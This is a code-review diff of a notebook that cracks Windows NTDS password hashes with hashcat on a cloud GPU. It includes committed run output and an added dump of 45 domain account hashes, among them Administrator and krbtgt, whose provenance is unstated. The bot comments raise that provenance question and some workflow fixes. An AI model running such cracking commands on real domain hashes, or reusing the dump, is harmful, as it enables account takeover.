"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 -1 ?l?d?u ?1?1?1?1?1?1?1?1\n",
|
||||||
|
"# ----- more than 3 days on a P100 --------\n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a \n",
|
||||||
|
"# !hashcat -m 1000 --potfile-path /content/cracked.pot --status --status-timer 300 -w 4 -O /content/*.ntds -a 3 ?a?a?a?a?a?a?a?a?a"
|
||||||
],
|
],
|
||||||
"execution_count": null,
|
"execution_count": null,
|
||||||
"outputs": []
|
"outputs": [
|
||||||
|
{
|
||||||
|
"output_type": "stream",
|
||||||
|
"text": [
|
||||||
|
"hashcat (v6.1.1-120-g15bf8b730) starting...\n",
|
||||||
|
"\n",
|
||||||
|
"\u001b[31mnvmlDeviceGetFanSpeed(): Not Supported\u001b[0m\n",
|
||||||
|
"\n",
|
||||||
|
"CUDA API (CUDA 10.1)\n",
|
||||||
|
"====================\n",
|
||||||
|
"* Device #1: Tesla P100-PCIE-16GB, 16017/16280 MB, 56MCU\n",
|
||||||
|
"\n",
|
||||||
|
"OpenCL API (OpenCL 1.2 CUDA 10.1.152) - Platform #1 [NVIDIA Corporation]\n",
|
||||||
|
"========================================================================\n",
|
||||||
|
"* Device #2: Tesla P100-PCIE-16GB, skipped\n",
|
||||||
|
"\n",
|
||||||
|
"Minimum password length supported by kernel: 0\n",
|
||||||
|
"Maximum password length supported by kernel: 27\n",
|
||||||
|
"\n",
|
||||||
|
"Hashes: 45 digests; 45 unique digests, 1 unique salts\n",
|
||||||
|
"Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates\n",
|
||||||
|
"Rules: 64\n",
|
||||||
|
"\n",
|
||||||
|
"Applicable optimizers applied:\n",
|
||||||
|
"* Optimized-Kernel\n",
|
||||||
|
"* Zero-Byte\n",
|
||||||
|
"* Precompute-Init\n",
|
||||||
|
"* Meet-In-The-Middle\n",
|
||||||
|
"* Early-Skip\n",
|
||||||
|
"* Not-Salted\n",
|
||||||
|
"* Not-Iterated\n",
|
||||||
|
"* Single-Salt\n",
|
||||||
|
"* Raw-Hash\n",
|
||||||
|
"\n",
|
||||||
|
"Watchdog: Temperature abort trigger set to 90c\n",
|
||||||
|
"\n",
|
||||||
|
"INFO: Removed 27 hashes found in potfile.\n",
|
||||||
|
"\n",
|
||||||
|
"Host memory required for this attack: 983 MB\n",
|
||||||
|
"\n",
|
||||||
|
"Dictionary cache hit:\n",
|
||||||
|
"* Filename..: /content/wordlists/hashesorg2019\n",
|
||||||
|
"* Passwords.: 1279729109\n",
|
||||||
|
"* Bytes.....: 13733214816\n",
|
||||||
|
"* Keyspace..: 81902662976\n",
|
||||||
|
"\n",
|
||||||
|
"\u001b[33mCracking performance lower than expected?\u001b[0m\n",
|
||||||
|
"\u001b[33m\u001b[0m\n",
|
||||||
|
"\u001b[33m* Update your backend API runtime / driver the right way:\u001b[0m\n",
|
||||||
|
"\u001b[33m https://hashcat.net/faq/wrongdriver\u001b[0m\n",
|
||||||
|
"\u001b[33m\u001b[0m\n",
|
||||||
|
"\u001b[33m* Create more work items to make use of your parallelization power:\u001b[0m\n",
|
||||||
|
"\u001b[33m https://hashcat.net/faq/morework\u001b[0m\n",
|
||||||
|
"\u001b[33m\u001b[0m\n",
|
||||||
|
"[s]tatus [p]ause [b]ypass [c]heckpoint [q]uit => "
|
||||||
|
],
|
||||||
|
"name": "stdout"
|
||||||
|
}
|
||||||
|
]
|
||||||
}
|
}
|
||||||
]
|
]
|
||||||
}
|
}
|
|
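Review bot: The only uncommented command in the "Crack your hashes" cell is the `hashesorg2019` + `hob064.rule` run listed under "Insane cracking - hashesorg2019 wordlist - several days ?", so following the notebook's own "Run all" instruction starts a multi-day job on a VM that the markdown says is erased "for every 12hrs or so". Make the quick `rockyou.txt` line the default and leave the long runs commented. Every command writes to `--potfile-path /content/cracked.pot`, but step 5 of the markdown still tells the user to recover `~/.hashcat/hashcat.potfile`; align the two so results are actually retrieved before the VM is wiped. The committed output (`Hashes: 45 digests`, `INFO: Removed 27 hashes found in potfile.`) is state from a previous session and should be cleared.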
@ -0,0 +1,45 @@
|
||||||
|
Administrator:500:111f37ed915c5716aad3b435b51404ee:eb37f9cd74303274cb923442a7348ef4:::
|
||||||
|
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
|
||||||
|
SUPPORT_388945a0:1001:aad3b435b51404eeaad3b435b51404ee:422feb7ef3b8cbea98bf9f0f76a50d81:::
|
||||||
|
ADDEMO$:1003:aad3b435b51404eeaad3b435b51404ee:d5d1a3d8e2ee4032ec4831c9f9342309:::
|
||||||
|
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:f031bf1f16bba6f9de84dffcc164e0f8:::
|
||||||
|
user01:1106:44efce164ab921caaad3b435b51404ee:32ed87bdb5fdc5e9cba88547376818d4:::
|
||||||
|
user02:1107:aad3b435b51404eeaad3b435b51404ee:e550853afc9a68106d73fd6680b25604:::
|
||||||
|
user03:1108:56c94ea187dbb8d6d4b8a9676de6053e:9aeae4ad385c29a8d3e25a2032df95ec:::
|
||||||
|
user04:1109:58ee1ecfcb1952c1aad3b435b51404ee:2a54f9c00701830e44923a19eea7df62:::
|
||||||
|
user05:1110:22d8afdd59cc02d1aad3b435b51404ee:336413710df33e5d6ef4ba82ba762543:::
|
||||||
|
user06:1111:843201b3eec511e619d76dfe3931be22:8810b6cff094d7bbfa9254a47e460e8c:::
|
||||||
|
user07:1112:d0d0b0a89785fea7dacc48edf1058ae1:d10107259670c218d8389bb05a6ca9a5:::
|
||||||
|
user08:1113:eb9fdbf6dde9d8a3c3f5ba53c6ea977d:81ed9d39c208fb710f16fd01df2c5ea3:::
|
||||||
|
user09:1114:ee3c975e9312263ac2265b23734e0dac:0d870c8d2ed66211a6cd19b6c8c6939a:::
|
||||||
|
user10:1115:e69e57fcbfc3742627bcbf149915a329:c1d5ff9561074a64e8164745f7e057a3:::
|
||||||
|
user11:1116:aad3b435b51404eeaad3b435b51404ee:125fee170ce858738fc08d61291174ed:::
|
||||||
|
user12:1117:3c152122664981d07a01665eb2eb6c14:3081116936973f2a1019178a085e77cd:::
|
||||||
|
user13:1118:aad3b435b51404eeaad3b435b51404ee:3f77a049f85d9ecb089313d68dc64796:::
|
||||||
|
user14:1119:6595863b3f65214eaad3b435b51404ee:7f5ab070d31e61251ab4ef78b6601941:::
|
||||||
|
user15:1120:8dfa87789573aa6caad3b435b51404ee:0794f987708fd36dc158c3435d1e9d65:::
|
||||||
|
user16:1121:bfa8b0f05b2ce944158759f68c114883:f85bbc519f1d4b9453d0d316d2f43efd:::
|
||||||
|
user17:1122:63aa06ca844a0123aad3b435b51404ee:5bd6fddd235507a2baf82843b6174b4e:::
|
||||||
|
user18:1123:aad3b435b51404eeaad3b435b51404ee:8d15a7e3fe3271b73180de20f9532111:::
|
||||||
|
user19:1124:078198d4eefc6c55aad3b435b51404ee:c09c4e921a0f7763e22aa5f38d73016a:::
|
||||||
|
user20:1125:44f388db34bb96628358f3d2c80c1dc5:9180c11efd4cb6149557f59b0cf80573:::
|
||||||
|
user21:1126:fdcfc2afb2d1be34aad3b435b51404ee:adc5df4b1f4a1b2501bbeef236f5be92:::
|
||||||
|
user22:1127:9fdfa4280126e140aad3b435b51404ee:2a3d0e353eadfb8c7b5d7d503efad47d:::
|
||||||
|
user23:1128:b273d8f0d4cb5bbcaad3b435b51404ee:b6c0168748dcdba30141914c959d9f8c:::
|
||||||
|
user24:1129:6d91129363e71245aad3b435b51404ee:e14af367857363b0f16418bcce9f96b9:::
|
||||||
|
user25:1130:9ad12257392cdacaaad3b435b51404ee:c57128805cc3e445a338126080ce52bb:::
|
||||||
|
user26:1131:12bd073e0404ed39aad3b435b51404ee:024b7f87b902332ac1369f2fd1a1d4e9:::
|
||||||
|
user27:1132:d12e81eacd737b89aad3b435b51404ee:23f8c70f8c51c5535e4ef372ffe9500a:::
|
||||||
|
user28:1133:adfc3aa0a57f3d1e944e2df489a880e4:458d16d08f6ba7c5c61cd3850b704015:::
|
||||||
|
user29:1134:5971713f415d2ff41104594f8c2ef12b:85ec40bb1fadfcd4f1cdd8f5c745338a:::
|
||||||
|
user30:1135:9ede745407ca42b2036d85e885962cfa:584c3288cdb9249191d01028fc3c1d06:::
|
||||||
|
user31:1136:3ceb8cc097f4b3bc274d6a66ff41a32b:a474953d36f287fefc73f8917ca27290:::
|
||||||
|
user32:1137:863a6a296d3d379888d84c068ac05e0a:80fadb7eb493333387c36c3a30a86a9c:::
|
||||||
|
user33:1138:e7c148e3c455aa1f8138c5e16c20cfc5:236ff73b5ec46c68c37d27d51bd4fa8f:::
|
||||||
|
user34:1139:c8e4acdacab3b81243b673bc86137536:2fce06c6e6303f0850416dfe57f809ac:::
|
||||||
|
user35:1140:aad3b435b51404eeaad3b435b51404ee:7b7b36c886e37d0a569de1eac512cf89:::
|
||||||
|
user36:1141:aad3b435b51404eeaad3b435b51404ee:4626a36dd0eccfcf71e13868990aaada:::
|
||||||
|
user37:1142:aad3b435b51404eeaad3b435b51404ee:c38307aa05d879e26becaa8156421571:::
|
||||||
|
user38:1143:aad3b435b51404eeaad3b435b51404ee:d97004b9867c89bdae80a4673d45ac0d:::
|
||||||
|
user39:1144:aad3b435b51404eeaad3b435b51404ee:b7ea6aa900be567c319f60add47db080:::
|
||||||
|
user40:1145:aad3b435b51404eeaad3b435b51404ee:28a198884cf2e2f4a7982333e89bd344:::
|
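Review bot: This new 45-line file commits a full `user:RID:LM:NT` dump, including `Administrator`, `krbtgt` and the `ADDEMO$` machine account, with LM values populated for many users, and nothing in the hunk or the README says where the data comes from. If it is lab or demo data, say so in the README next to the "Example NTDS" reference; if there is any chance it originates from an engagement, it should not be in the repository or its history. Since the notebook workflow recommends running hashonymize before upload, shipping the sample in anonymized form would also make the example match the documented procedure.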